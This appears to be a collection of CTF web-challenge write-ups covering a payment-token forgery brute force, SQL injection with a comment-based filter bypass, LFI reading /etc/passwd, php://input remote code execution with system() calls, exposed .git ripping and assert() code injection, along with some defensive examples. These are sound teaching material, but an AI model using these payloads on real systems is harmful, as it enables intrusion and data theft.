[Pragyan CTF] Supreme Leader

Description:

North Korea reportedly has a bioweapon in the making. Hack into their database and steal it.

Link : http://139.59.62.216/supreme_leader

For the second web challenge we're given a URL; let's open it.

Cute Kim 🙂

Now let's dump the response headers with curl:

Megabeets$ curl -D - http://139.59.62.216/supreme_leader/
HTTP/1.1 200 OK
Date: Sun, 05 Mar 2017 08:47:14 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.20
Set-Cookie: KimJongUn=2541d938b0a58946090d7abdde0d3890_b8e2e0e422cae4838fb788c891afb44f; expires=Sun, 05-Mar-2017 08:47:24 GMT; Max-Age=10
Set-Cookie: KimJongUn=TooLateNukesGone; expires=Sun, 05-Mar-2017 08:47:25 GMT; Max-Age=10
Vary: Accept-Encoding
Content-Length: 1117
Content-Type: text/html

 

We can see an interesting cookie: KimJongUn=2541d938b0a58946090d7abdde0d3890_b8e2e0e422cae4838fb788c891afb44f. The value looks like two MD5 hashes (two runs of 32 hex characters) joined with "_". Note that the server immediately overwrites it with a second Set-Cookie (TooLateNukesGone, one second later), so a browser never keeps the interesting value; it is only visible in the raw headers. Let's try to crack the two hashes online using my favorite site.
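As an added example (my own Python, not part of the original write-up), the script below pulls every Set-Cookie value for KimJongUn out of the raw headers shown above, checks that the value has the md5_md5 shape, and runs a dictionary attack over a constructed wordlist. The wordlist and the make_cookie helper are assumptions for the demo; the script does not claim which two words the real digests decode to.

```python
import hashlib
import re

# Raw response headers, copied from the curl output in the write-up.
HEADERS = """HTTP/1.1 200 OK
Set-Cookie: KimJongUn=2541d938b0a58946090d7abdde0d3890_b8e2e0e422cae4838fb788c891afb44f; expires=Sun, 05-Mar-2017 08:47:24 GMT; Max-Age=10
Set-Cookie: KimJongUn=TooLateNukesGone; expires=Sun, 05-Mar-2017 08:47:25 GMT; Max-Age=10
Content-Type: text/html
"""

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def set_cookie_values(raw_headers: str, name: str) -> list:
    """Every value the server set for cookie `name`, in order of appearance.

    A browser keeps only the last one, so an overwritten first value is
    visible only in the raw headers (curl -D), never in the cookie jar.
    """
    values = []
    for line in raw_headers.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        pair = line.split(":", 1)[1].strip().split(";", 1)[0]
        key, _, value = pair.partition("=")
        if key.strip() == name:
            values.append(value.strip())
    return values


def split_md5_pair(value: str):
    """Split 'h1_h2' into two candidate MD5 digests; None if it isn't that shape."""
    parts = value.split("_")
    if len(parts) == 2 and all(MD5_RE.match(p) for p in parts):
        return tuple(parts)
    return None


def crack_md5(digest: str, wordlist: list):
    """Dictionary attack: the word whose MD5 matches, else None."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def make_cookie(word_a: str, word_b: str) -> str:
    """Build a cookie value in the same 'md5_md5' layout (hypothetical, for local testing)."""
    return "_".join(hashlib.md5(w.encode()).hexdigest() for w in (word_a, word_b))


def crack_cookie(value: str, wordlist: list):
    """Crack both halves of an 'md5_md5' cookie; halves not in the wordlist come back as None."""
    pair = split_md5_pair(value)
    if pair is None:
        return None
    return tuple(crack_md5(d, wordlist) for d in pair)


if __name__ == "__main__":
    first, last = set_cookie_values(HEADERS, "KimJongUn")
    # Constructed wordlist; the online service used in the write-up has a far larger one.
    wordlist = ["send", "nukes", "kim", "flag", "supreme", "leader"]
    print("first value :", first, "->", crack_cookie(first, wordlist))
    print("final value :", last, "->", split_md5_pair(last))
```

The one practitioner detail worth keeping from this: when two Set-Cookie headers carry the same name, the last one wins in the browser, so always read the raw response rather than the stored cookie when a challenge (or a real app) looks like it is leaking something transient.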

That’s it! Here is the flag: pragyanctf{send_nukes}

[33C3 CTF] pay2win Writeup

Description:

pay2win – Web
Do you have enough money to buy the flag?

This challenge was pretty tricky to understand at the beginning. I solved it with a quick and simple workaround that got me the flag without fully understanding the challenge. Once I had the flag I understood the whole story. So, as with all stories, we need to begin from the start.

We're given a website where we can buy two products: 'cheap' (13.37 USD) and 'flag' (31337.42 USD). We, of course, want to buy the 'cheap' one because we don't want to spend our money on some leet flag with the answer to life, the universe and blah blah. So, the 'cheap' it is.

pay2win_1

In order to buy the product we need to supply a valid credit-card number; there are plenty of examples of valid test card numbers online.

pay2win_2

Let's try one of them and see what we get.

pay2win_3

Woo-hoo! We finally bought the 'cheap' product and fulfilled our dream.
Kidding. Let's move on and see what we get when trying to buy the 'flag'.

pay2win_4

pay2win_5

"failed"? Oh no. The server says we exceeded the credit-card limit. The first thing that came to mind was to brute-force the server with valid CC numbers, but I quickly figured out that this isn't the way to the solution. Then I noticed something interesting about the URLs of the pages: there's a GET parameter named 'data', and parts of its value are the same on every request. Until then I had assumed it was a fresh hash every time. I grabbed pencil and paper and started to work out the patterns and the shared parts. Okay, okay, I admit it: I opened VS Code and made a simple table, with the shared parts highlighted in Photoshop.

pay2win_6

As you can see, every token is built from three parts. The beginning of each type is shared, and so is the end. I guessed that a certain combination is required to get the flag. But how do I combine the parts into the right token to get the 'flag' content? Now it's a matter of trial and error. Or not.

After two manual tries I gave up, because automation is always better, and here comes the workaround I mentioned before. I made a list with one instance of every coloured part, plus one example of a white part from each page. From this list I generated every ordered selection of 3 parts, i.e. all possible combinations (990 of them), and tried each of them with urllib until I found '33C3' in the response.

I know. It isn't the most efficient way to do this, but it was short and quick.

import itertools
import urllib.request

# Every distinct segment seen in a 'data' token: each coloured (shared)
# part once, plus one white (per-request) part from every page.
hash_parts = ['28df361f896eb3c3706cda0474915040',
              '5e4ec20070a567e096d3b89ed5a54b1d',
              '23b5b0554edda4f8828df361f896eb3c3706cda0474915040',
              '4f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f',
              '232c66210158dfb23a2eda5cc945a0a9650c1ed0fa0a08f6',
              '2f7ef761e2bbe791',
              '47aae22e7d77d379272d81aff52de2a5',
              'eaa0a3d415f1a595',
              '5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c8',
              '11fca73d28d20f8',
              '6e9cc7ab82a57f00']

# Every ordered choice of 3 distinct parts: 11 * 10 * 9 = 990 candidate tokens.
all_permutations = [''.join(parts) for parts in itertools.permutations(hash_parts, 3)]

for token in all_permutations:
    url = "http://78.46.224.78:5000/payment/callback?data=%s" % token
    try:
        body = urllib.request.urlopen(url).read().decode('utf-8', 'replace')
    except Exception:
        continue            # invalid tokens make the server error out; keep going
    if '33C3' in body:
        print('found:', token)

# result:
# found: 5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c847aae22e7d77d379272d81aff52de2a54f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f
# found: 5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c847aae22e7d77d379272d81aff52de2a52f7ef761e2bbe791
# found: 5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c86e9cc7ab82a57f004f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f

 

The script took two minutes to run and came up with three candidate tokens; let's try one of them to see whether we really get the flag:

pay2win_7

YES! We got the flag! I took a deep breath and analysed the matching tokens to find out the right pattern. I came up with two possible patterns:

5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c8 + X + 2f7ef761e2bbe791
5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c8 + X + 4f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f
Where X is one of the white parts of ‘flag’ product (purchase page/success).

The logic behind it is as follows: the blue part stands for 'success', the light-blue part for 'failed' and the yellow part most likely for 'product page'. Take any token of the 'flag' product (product page / purchase failed), replace its first part (light-blue / yellow) with the blue 'success' part, and you get a token the server accepts as a successful purchase of the flag. Nothing in the token binds the status part to the rest, so the server has no way to tell a forged combination from a real one.
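To make the weakness concrete, here is an added example (my own Python, not the challenge's code) with a hypothetical three-part token of the same shape: a status part, a per-request part and a product part. The vulnerable callback trusts any combination, so the status swap from the write-up works; the hardened version appends an HMAC over the whole token and rejects the forged one. The part values, the key and the token layout are assumptions for the demo, not the real server's.

```python
import hashlib
import hmac
import secrets

# Hypothetical token layout modelled on the three-part 'data' tokens above:
# <status part><per-request part><product part>. All values are made up.
STATUS = {"success": "aa" * 24, "failed": "bb" * 24, "product_page": "cc" * 24}
PRODUCT = {"cheap": "11" * 8, "flag": "22" * 8}
KEY = b"server-side-secret-for-the-demo"   # hypothetical, never leaves the server


def issue_token(status: str, product: str) -> str:
    """Vulnerable issuer: plain concatenation, nothing ties the parts together."""
    return STATUS[status] + secrets.token_hex(24) + PRODUCT[product]


def parse_token(token: str) -> tuple:
    """Vulnerable parser: believes whatever status/product parts it finds."""
    status = next(k for k, v in STATUS.items() if token.startswith(v))
    product = next(k for k, v in PRODUCT.items() if token.endswith(v))
    return status, product


def callback_vulnerable(token: str) -> str:
    status, product = parse_token(token)
    return "33C3_FLAG" if (status, product) == ("success", "flag") else status


def forge(failed_flag_token: str, any_success_token: str) -> str:
    """The write-up's trick: graft the 'success' prefix onto a 'flag' token."""
    n = len(STATUS["success"])
    return any_success_token[:n] + failed_flag_token[n:]


# Hardened form: the same token body, followed by an HMAC-SHA256 tag over it.
def issue_token_signed(status: str, product: str) -> str:
    body = STATUS[status] + secrets.token_hex(24) + PRODUCT[product]
    tag = hmac.new(KEY, body.encode(), hashlib.sha256).hexdigest()
    return body + tag


def parse_token_signed(token: str) -> tuple:
    body, tag = token[:-64], token[-64:]
    expected = hmac.new(KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):      # constant-time compare
        raise ValueError("bad token")
    return parse_token(body)


def callback_hardened(token: str) -> str:
    try:
        status, product = parse_token_signed(token)
    except ValueError:
        return "invalid"
    return "33C3_FLAG" if (status, product) == ("success", "flag") else status


if __name__ == "__main__":
    cheap_ok, flag_failed = issue_token("success", "cheap"), issue_token("failed", "flag")
    print("vulnerable, forged :", callback_vulnerable(forge(flag_failed, cheap_ok)))
    s_cheap, s_flag = issue_token_signed("success", "cheap"), issue_token_signed("failed", "flag")
    print("hardened, forged   :", callback_hardened(forge(s_flag, s_cheap)))
```

The swap would also be stopped by not putting purchase state in a client-held token at all (an opaque server-side reference looked up in a database), but if state must travel through the client, a MAC over the complete token is the minimum.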

That's it. The flag is: 33C3_3c81d6357a9099a7c091d6c7d71343075e7f8a46d55c593f0ade8f51ac8ae1a8
I'd be happy to read in the comments how the challenge went for you.

[H4CK1T 2016] QRb00k – Russia Writeup

Description:

Task: QRb00k – Russia – W3b – 400
The secured messenger was developed in Canada, it’s using systems with qr keys for communicating, it allows to read other people’s messages only to this key holders. But is it true? And you have to figure it out …
http://hack-quest.com

This was a very good web challenge. It took me quite some time to fully understand it, but it was absolutely worth its 400 points.

Starting the challenge, we are given a messenger site that uses QR codes to communicate. The site has two main pages:

  • Create – which creates QR code from a given name and message
  • Read – an upload form to upload QR code and read the message inside

So let’s create a message:

We got a QR code which is the key to read our message:

Now let’s read the message using the QR code:

 

Ok, it all worked as it was supposed to. I used the zxing service to view the content of the QR code:

h4ck1t_russia_4

Look at the raw text. It's a short string that looks base64-encoded. But wait: base64 can't begin with "=="! Padding characters only ever appear at the end of a base64 string. Is it reversed? Let's check:

>>> import base64
>>> base64.b64decode("==QehRXS"[::-1])
b'Itay'

Yes! It was indeed reversed. Our key (the QR code) is created by: QR(Reverse(Base64(name))).

Ok, now that we understand the mechanics, let the party begin: time to play with SQL injection. To create the QR codes I used this site; it was faster than using the challenge site.

I began with the obvious: ' or 1=1--

h4ck1t_russia_5

Whoops, busted. The system recognised my SQLi attempt. I tried some filter-bypass methods and succeeded with this input, which replaces every space with an inline comment (/*..*/) so the query still parses without containing a single space:

'/*..*/union/*..*/select/*..*/database()/*..*/union/*..*/select/*..*/'Megabeets

Reverse(Base64(input)) == “==wc0VWZiF2Zl10JvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8SKoU2chJWY0FGZvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8yJ”

h4ck1t_russia_6

It worked! Now let's find the right table ("messages") and column by running a few queries to map the database:

Reverse(Base64(input)) == “zRXZlJWYnVWTn8iKu4iKvQ3YlxWZz9iKu4iKv42bp5WdvoiLuoyLnMXZnF2czVWbn8iKu4iKvU2apx2Lq4iLq8SZtFmbfVGbiFGdvoiLuoyLlJXZod3Lq4iLq8ycu1Wds92YuEWblh2Yz9lbvlGdh1mcvZmbp9iKu4iKv02byZ2Lq4iLq8SKl1WYu9lbtVHbvNGK0F2Yu92YfBXdvJ3ZvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8yJ”

'/*..*/union/*..*/select/*..*/group_concat(column_name)/*..*/from/*..*/information_schema.columns/*..*/where/*..*/table_name/*..*/like/*..*/'messages'/*..*/union/*..*/select/*..*/'Megabeets

h4ck1t_russia_7

“secret_field”? Sounds suspicious. Let’s query it and see what it contains:

'/*..*/union/*..*/select/*..*/secret_field/*..*/from/*..*/messages/*..*/union/*..*/select/*..*/'Megabeets

h4ck1t_russia_8

And we got the flag! I honestly really enjoyed this challenge.

Flag: h4ck1t{I_h@ck3d_qR_m3Ss@g3r}
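An added example (my own Python, not the challenge's code) that ties the pieces of this write-up together: the key encoding observed with zxing, the space-to-comment rewrite used for the filter bypass, and a constructed SQLite stand-in for the vulnerable "Read" handler so the injection can be run offline. The filter rule (reject spaces and "--") and the query shape are assumptions modelled on what the challenge accepted and rejected; the table layout is constructed, and only the table name messages and the column secret_field come from the write-up.

```python
import base64
import sqlite3


# Observed key format: QR text = Reverse(Base64(name)).
def encode_key(name: str) -> str:
    return base64.b64encode(name.encode()).decode()[::-1]


def decode_key(qr_text: str) -> str:
    return base64.b64decode(qr_text[::-1]).decode()


def comment_spaces(sql_fragment: str) -> str:
    """Replace each space with an inline comment. SQL tokenisers treat /*..*/
    as whitespace, so the statement still parses but contains no spaces."""
    return sql_fragment.replace(" ", "/*..*/")


def filter_blocks(name: str) -> bool:
    """Assumed WAF rule modelled on the observed behaviour: ' or 1=1-- was
    caught, the comment-laced payload was not."""
    return " " in name or "--" in name


def demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the messenger's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (name TEXT, message TEXT, secret_field TEXT)")
    db.execute("INSERT INTO messages VALUES ('Itay', 'hello', 'constructed-secret')")
    db.commit()
    return db


def read_message(db: sqlite3.Connection, qr_text: str) -> list:
    """Vulnerable 'Read' handler: decode the key, then build the SQL by string
    formatting (assumed; the write-up only shows that injection works)."""
    name = decode_key(qr_text)
    if filter_blocks(name):
        return ["Busted"]
    query = "SELECT message FROM messages WHERE name = '%s'" % name
    return [row[0] for row in db.execute(query)]


def inject(db: sqlite3.Connection, sql_fragment: str) -> list:
    """Wrap a space-separated fragment the way the write-up does: close the
    string, splice in the comment-spaced fragment, then re-open the string with
    a trailing name so the application's own closing quote stays balanced."""
    payload = "'" + comment_spaces(sql_fragment) + "'Megabeets"
    return read_message(db, encode_key(payload))


if __name__ == "__main__":
    db = demo_db()
    print(read_message(db, encode_key("Itay")))
    print(read_message(db, encode_key("' or 1=1--")))
    print(inject(db, " union select secret_field from messages union select "))
```

inject(db, " union select secret_field from messages union select ") produces exactly the last payload shown above; the extra union select 'Megabeets' at the end is what absorbs the closing quote the application appends.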

 

If you have any questions feel free to ask 🙂

[H4CK1T 2016] Pentest – Mexico Writeup

Description:

Task: Remote pentest – Mexico – 150 – Web

Our foreign partners have some problems with qualified staff in the field of information technology, we decided to help them and to conduct remote testing of their new website. Your task is to find a hole in the system and grab some information to confirm the hack. Good luck!
http://91.231.84.36:9150/

YAY! Web challenge! If you follow my blog (if not, the subscribe form is on the left) you already know how much I love web challenges: it's either easy points or a great puzzle.

Let’s open the website and see what we have:

h4ck1t_mexico1

WOW! JUSTICE LEAGUE! Did I mention that I love comic books, and especially Batman? Oh, not yet?

Well, this challenge is going to be awesome. No. It’s already awesome!

OK, deep breath. Let’s start. See that menu on the bottom? Let’s click on some link to see what will happen.

h4ck1t_mexico2

Look at the URL: the "about" page is included by "index.php" using PHP's require or include. When we see something like that in a challenge we should check whether the site is vulnerable to LFI. In a Local File Inclusion attack we make the server include files from its own filesystem. Let's try to include /etc/passwd to confirm the vulnerability:

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd

Didn't work. Let's try adding a null byte at the end, the classic truncation trick that drops whatever the application appends to our input:

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd%00

h4ck1t_mexico3

It worked! We successfully got the /etc/passwd file. So what now? Let's try to read the PHP source itself to see whether the flag is in one of the PHP pages.

We can use php://filter to return the content of index.php base64-encoded. We need the encoding because otherwise the PHP engine would execute the PHP parts of the file instead of showing them. The resource is just "index" because the application appends ".php" itself:

http://91.231.84.36:9150/index.php?page=php://filter/convert.base64-encode/resource=index

We got the encoded page; now let's decode it and see if we find a flag. I deleted some content to reduce the size of the code in the post. Note the preg_replace that strips everything from the first null byte onward: the challenge deliberately emulates the old PHP null-byte truncation bug, which is why %00 worked.

<?php
    if ($_GET["page"]) {
    $file = $_GET["page"].".php";
    // simulate null byte issue
    $file = preg_replace('/\x00.*/',"",$file);
        include($file);
    } 
    else
    {
        echo '    <div class="container">
        <div class="row">
            <div class="col-md-6 col-sm-12">
                <h1>The Big Picture</h1>
                <p>Welcome to the Big Picture. This fantastic digital resource combines the best of formal and informal learning. 
If you are already using The Big Picture, you can register for and access exclusive extra material from this platform. 
This is The Big Picture: have you experienced it yet?  </p> 
            </div>
        </div>';
    }
    //flag{h@h@h@_man_n1ce_try} 

?>
<!DOCTYPE html>
<html class="full" lang="en">
<head>

...
...
...

    </div>
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap.min.js"></script>

</body>

</html>

 

Nope. No flag. The "flag{…}" thing isn't the real flag, because flags in this CTF are in the h4ck1t{…} format.
The other pages, 'about' and 'contact', don't contain a flag either. So we probably need to turn the LFI into RCE (Remote Code Execution). We can use the php://input wrapper to send PHP code in the body of a POST request: include() reads the stream, so whatever we POST gets executed (this only works when allow_url_include is enabled, which it evidently was here). With the Firefox HackBar plugin this is easy.
Set the URL to http://91.231.84.36:9150/index.php?page=php://input and the POST data to

<?  system('ls') ;?>

h4ck1t_mexico4

Success. We got RCE, and now we know about a new secret file. Let's read it the same way, but this time with

 <?  system('cat file') ;?>

And we got the flag 🙂

Flag: h4ck1t{g00d_rfi_its_y0ur_fl@g}
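As an added example (my own Python, not the challenge's code), the script below models the include resolution from the recovered index.php so the three probes from this write-up can be checked offline, and builds the php://filter and php://input requests. resolve_include re-implements the ".php" append plus the null-byte regex from the recovered source; the HTML returned by sample_filter_response is constructed, and the target URL is the one from the write-up.

```python
import base64
import re
import urllib.parse
import urllib.request

TARGET = "http://91.231.84.36:9150/index.php"   # challenge URL from the write-up


def resolve_include(page: str) -> str:
    """Model of the recovered index.php: '.php' is appended to ?page=, then the
    old null-byte truncation is emulated with the same regex the challenge used
    (preg_replace('/\\x00.*/', '', $file)). Python re-implementation, for illustration."""
    file = page + ".php"
    return re.sub(r"\x00.*", "", file)


def lfi_url(page: str) -> str:
    """GET URL for a page value; a raw NUL has to travel as %00."""
    return TARGET + "?page=" + urllib.parse.quote(page, safe="/:=")


def filter_url(script: str) -> str:
    """php://filter wrapper that returns the target's source base64-encoded
    instead of executing it. No '.php' on the resource: the app appends it."""
    return lfi_url("php://filter/convert.base64-encode/resource=" + script)


def decode_filter_output(body: str) -> str:
    """Pull the longest base64 run out of the returned HTML and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/=]{16,}", body)
    if not runs:
        raise ValueError("no base64 blob in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


def rce_request(php: str) -> urllib.request.Request:
    """LFI to RCE through php://input: include() reads the POST body as the
    file to execute. Requires allow_url_include=On on the target."""
    return urllib.request.Request(TARGET + "?page=php://input",
                                  data=php.encode(), method="POST")


def sample_filter_response() -> str:
    """Constructed stand-in for the HTML the server would return for filter_url('index')."""
    blob = base64.b64encode(b"<?php echo 'constructed'; ?>").decode()
    return "<html><body>" + blob + "</body></html>"


if __name__ == "__main__":
    for probe in ("../../../../etc/passwd", "../../../../etc/passwd\x00",
                  "php://filter/convert.base64-encode/resource=index"):
        print(repr(probe), "->", resolve_include(probe))
    print(filter_url("index"))
    print(decode_filter_output(sample_filter_response()))
    req = rce_request("<?php system('ls'); ?>")
    print(req.get_method(), req.full_url, req.data)
```

Running the three probes through resolve_include shows why the first attempt failed (it asked for /etc/passwd.php), why %00 fixed it, and why the filter URL names index rather than index.php.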

[CSAW 2016] mfw Writeup

Description:

Hey, I made my first website today. It’s pretty cool and web7.9.
http://web.chal.csaw.io:8000/

 

Entering the site, the first thing that comes to mind is an LFI attack: the site includes whichever page is named in the URL.

The following table describes the possible response pages:

URL                                                         Result
http://web.chal.csaw.io:8000/?page=home                     The "home" page is shown.
http://web.chal.csaw.io:8000/?page=about                    The "about" page is shown.
http://web.chal.csaw.io:8000/?page=contact                  The "contact" page is shown.
http://web.chal.csaw.io:8000/?page=Megabeets                Just a message saying: "That file doesn't exist!"
http://web.chal.csaw.io:8000/?page=flag                     An empty page is shown inside the website.
http://web.chal.csaw.io:8000/?page=../../../../etc/passwd   Just a message saying: "Detected hacking attempt!"

Looking at the source code, I saw the following comment:

<!--<li ><a href="?page=flag">My secrets</a></li> -->

Ok, I need to get the "flag" page, but none of the LFI techniques I tried worked. Then I thought of something else: on the "about" page the site's creator mentions that it was built using git. So let's see whether we can download the repository. http://web.chal.csaw.io:8000/.git/config exists, so I downloaded the repository with DVCS-RIPPER. An exposed .git/ directory hands over the complete source, which is exactly what we need to see how the page parameter is handled.
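To show what a ripper actually does with an exposed .git/, here is an added example (my own Python, not DVCS-RIPPER's code and not the challenge's): it walks HEAD to the branch ref, to the commit, to its tree, and fetches and verifies each loose object. The "repository" it runs against is constructed in memory; against a real site, fetch would be an HTTP GET of the same paths.

```python
import hashlib
import zlib


def make_loose_object(obj_type: str, content: bytes) -> tuple:
    """(sha1, zlib blob) for a loose object exactly as git stores it:
    '<type> <size>\\0<content>', deflated, named by the SHA-1 of the raw form."""
    raw = b"%s %d\x00" % (obj_type.encode(), len(content)) + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def object_path(sha: str) -> str:
    """Where a loose object lives under .git/ (first two hex chars are the directory)."""
    return ".git/objects/%s/%s" % (sha[:2], sha[2:])


def parse_loose_object(blob: bytes) -> tuple:
    """Inflate a loose object into (type, content), checking the declared size."""
    raw = zlib.decompress(blob)
    header, _, content = raw.partition(b"\x00")
    obj_type, size = header.split(b" ")
    if int(size) != len(content):
        raise ValueError("size mismatch")
    return obj_type.decode(), content


def verify_object(sha: str, blob: bytes) -> bool:
    """Object names are content hashes, so every fetched object can be checked."""
    return hashlib.sha1(zlib.decompress(blob)).hexdigest() == sha


def head_ref(head_text: str) -> str:
    """.git/HEAD normally reads 'ref: refs/heads/<branch>'."""
    return head_text.strip().split("ref: ", 1)[-1]


def commit_tree(commit: bytes) -> str:
    """The first header line of a commit object is 'tree <sha>'."""
    return commit.split(b"\n", 1)[0].split(b" ", 1)[1].decode()


def parse_tree(tree: bytes) -> list:
    """Tree entries are '<mode> <name>\\0<20 raw sha bytes>', back to back."""
    entries, i = [], 0
    while i < len(tree):
        j = tree.index(b"\x00", i)
        mode, name = tree[i:j].split(b" ", 1)
        entries.append((mode.decode(), name.decode(), tree[j + 1:j + 21].hex()))
        i = j + 21
    return entries


def rip(fetch) -> dict:
    """HEAD -> ref -> commit -> tree -> blobs via fetch(path) -> bytes.
    Returns {filename: content} for the top-level tree of the current branch."""
    ref = head_ref(fetch(".git/HEAD").decode())
    commit_sha = fetch(".git/" + ref).decode().strip()
    _, commit = parse_loose_object(fetch(object_path(commit_sha)))
    _, tree = parse_loose_object(fetch(object_path(commit_tree(commit))))
    files = {}
    for _mode, name, sha in parse_tree(tree):
        blob = fetch(object_path(sha))
        if not verify_object(sha, blob):
            raise ValueError("corrupt object " + sha)
        obj_type, content = parse_loose_object(blob)
        if obj_type == "blob":
            files[name] = content
    return files


def demo_repo() -> dict:
    """Constructed in-memory repository with a single file."""
    blob_sha, blob = make_loose_object("blob", b"<?php $FLAG = 'constructed'; ?>\n")
    tree_sha, tree = make_loose_object("tree", b"100644 flag.php\x00" + bytes.fromhex(blob_sha))
    commit_sha, commit = make_loose_object(
        "commit", b"tree " + tree_sha.encode() + b"\nauthor demo <d@example> 0 +0000\n\ninitial\n")
    return {
        ".git/HEAD": b"ref: refs/heads/master\n",
        ".git/refs/heads/master": commit_sha.encode() + b"\n",
        object_path(blob_sha): blob,
        object_path(tree_sha): tree,
        object_path(commit_sha): commit,
    }


if __name__ == "__main__":
    print(rip(demo_repo().__getitem__))
```

Real repositories often keep branch heads in packed-refs and most objects in packfiles rather than as loose objects; DVCS-RIPPER handles those cases, this model deliberately does not. The defensive check is the mirror image: request /.git/HEAD on your own hosts and make sure it is not served.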

You can find index.php here.

So the page passes the request through assert(), and assert() given a string evaluates that string as PHP code, which gives us code injection. After a little trial and error I came up with the answer (the payload closes the string inside the assertion, ORs in a var_dump of the flag template, and comments out the rest of the line):

(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content

And received the flag:

string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>
"
Detected hacking attempt!

If you enter the URL in a browser, the flag seems to be missing: the browser treats the "<?php … ?>" text as a bogus comment and hides it. Look at the page source (Ctrl+U) and the flag is there.